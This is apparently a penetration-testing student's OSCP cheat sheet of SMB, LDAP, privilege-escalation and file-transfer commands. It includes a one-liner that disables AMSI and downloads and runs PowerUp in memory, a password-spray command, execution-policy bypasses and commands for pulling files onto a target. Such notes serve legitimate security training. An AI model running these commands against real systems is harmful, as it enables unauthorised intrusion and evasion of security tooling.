OSCP notes

My OSCP notes

Active Directory

Enumeration

SMB

SMBCLIENT

  • List shares with a null session (no password)
    smbclient --no-pass -L //<IP>
    
  • Get list of shares on the target
    smbclient -L //<IP>/
    
  • Login with no password and no username
    smbclient -L //<IP>/ -U '' -N
    
  • Login with username
    smbclient -L //<IP>/ -U '<USERNAME>' -N
    
  • Login with username and password
    smbclient -L //<IP>/ -U <USERNAME>%<PASSWORD>
    
  • Connect to a share without login information
    smbclient //<IP>/<SHARE>
    
  • Download file from the target machine to our attack machine
    smb: \> get file_example.txt
    
  • Upload a malicious file from our attack machine to the target machine
    smb: \> put malicious_file
    

SMBMAP

  • Null user session
    smbmap -H <IP> -P <PORT>
    
  • With creds
    smbmap -u "<USERNAME>" -p "<PASSWORD>" -H <IP> -P <PORT>
    

CRACKMAPEXEC

  • Enumerate the AD shares with a null session
    crackmapexec smb <IP> -u '' -p '' --shares
    
  • Enumerate the AD shares with credentials (e.g. the Guest user)
    crackmapexec smb <IP> -u '<USERNAME>' -p '<PASSWORD>' --shares
    
  • Enumerate the AD shares with credentials, passing the NTLM hash instead of a password
    crackmapexec smb <IP> -u '<USERNAME>' -H '<HASH>' --shares
    
  • Password spray (a user list against a password list over the chosen protocol)
    crackmapexec <PROTOCOL> <IP> -u <USER_LIST> -p <PASSWORD_LIST>
    

ENUM4LINUX

  • Run all enum4linux tests at once
    enum4linux -a <IP>
    

LDAP

ldapsearch

  • Dump information from the LDAP service with an anonymous bind (-x); replace the base DN with the target domain
    ldapsearch -v -x -b "DC=domain,DC=lolo" -H "ldap://<IP>" > ldapsearch.txt
    

Priv esc

Common windows priv esc enumeration commands

  • systeminfo
    systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" 
    
  • whoami
    whoami /priv 
    
  • netstat (listening ports and owning PIDs)
    netstat -ano
    
  • If those commands are not found, reset PATH to the system directories first
    set PATH=%SystemRoot%\system32;%SystemRoot%;
    
  • PowerUp (downloads PowerUp.ps1 and runs Invoke-AllChecks)
    [Ref].Assembly.GetType('System.Management.Automation.Amsi'+"Utils").GetField("amsiInit"+"Failed","NonPublic,Static").SetValue($null,$true);IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1");Invoke-AllChecks;
    

File Transfer

  • Wget
    wget http://ip:port/file_to_get
    
  • Curl
    curl http://ip:port/file_to_get --output file_to_get
    
  • Certutil (Windows only)
    certutil.exe -urlcache -split -f "http://ip:port/file_to_get" C:\Users\Public\Downloads\file_to_get
    
  • SCP (copy a file from a remote Windows host running OpenSSH into the current directory)
    scp user@IP:C:/Users/file_to_get .
    
  • PowerShell (Windows only)
    (New-Object System.Net.WebClient).DownloadFile("http://IP/file_to_get", "C:\Example\path\test\file_to_get")
    
  • You can also run a script with the execution policy bypassed (the full path works even when powershell.exe is not in PATH)
    C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -ep bypass script_to_execute
    
    powershell.exe -ep bypass script_to_execute
    
  • netcat
    • On the receiving machine (listen and write whatever arrives to a file)
      nc -l -p <PORT> > file_to_get
      
    • On the sending machine (connect, send the file, close after 3 seconds of idle)
      nc -w 3 <IP> <PORT> < file_to_send
      

Find files on a Windows machine (/s searches subdirectories, /p pauses after each screen)

  dir proof.txt /s /p
  dir *.txt /s /p

Find files on a Linux machine (errors from unreadable directories are discarded)

  find / -type f -name "*.txt" 2>/dev/null

Important links